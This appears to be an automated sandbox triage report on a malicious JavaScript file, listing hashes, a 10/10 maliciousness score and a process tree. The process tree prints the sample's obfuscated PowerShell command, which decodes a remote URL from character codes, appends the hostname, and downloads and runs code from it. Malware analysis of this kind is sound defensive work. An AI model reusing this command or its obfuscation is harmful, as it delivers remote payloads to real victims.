235da4cc8cbb28773f506c2eade14d604e8cec2335c735ac4795c748bf949022 | Triage

Analysis

max time kernel
387s
max time network
1588s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
12-05-2023 02:28

Sharing

Report Analysis Logs

General

Target

JNVW0235_6548701.js
Size

657KB
MD5

611ded3df6e519ae7751567593ae1dd0
SHA1

14bcc9d88a3c6fb3089b1bf2cd129ced9b4f4b7a
SHA256

235da4cc8cbb28773f506c2eade14d604e8cec2335c735ac4795c748bf949022
SHA512

e929631024acbe475a79cc0e1226c5f836fae8aee9d6072dfc2aa54d9da774b26e32aaaab94c3c93b7bef08582a4a7bbde9365edc053e01e51e42d23641d8e2d
SSDEEP

3072:P+GEufilMmATfHsCnYUEB31HzY7LGjlDZZRSMSw8xHbsR5iuR7d4gz0yTalWINCo:QaEHW

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3980	3876	conhost.exe	66

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\JNVW0235_6548701.js
1⤵
PID:4128

C:\Windows\system32\conhost.exe
conhost --headless powershell $grt=$(hostname);@(7450,7462,7462,7458,7404,7393,7393,7466,7467,7447,7467,7466,7392,7462,7457,7458,7393,7460,7462,7392,7458,7450,7458,7409,7451,7407)|foreach{$dolauw=$dolauw+[char]($_-7346)};$lkqdfj='l';new-alias trys cur$lkqdfj;.$([char](6692-6587)+'ex')(trys -useb "$dolauw$grt")
1⤵
- Process spawned unexpected child process
PID:3980

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads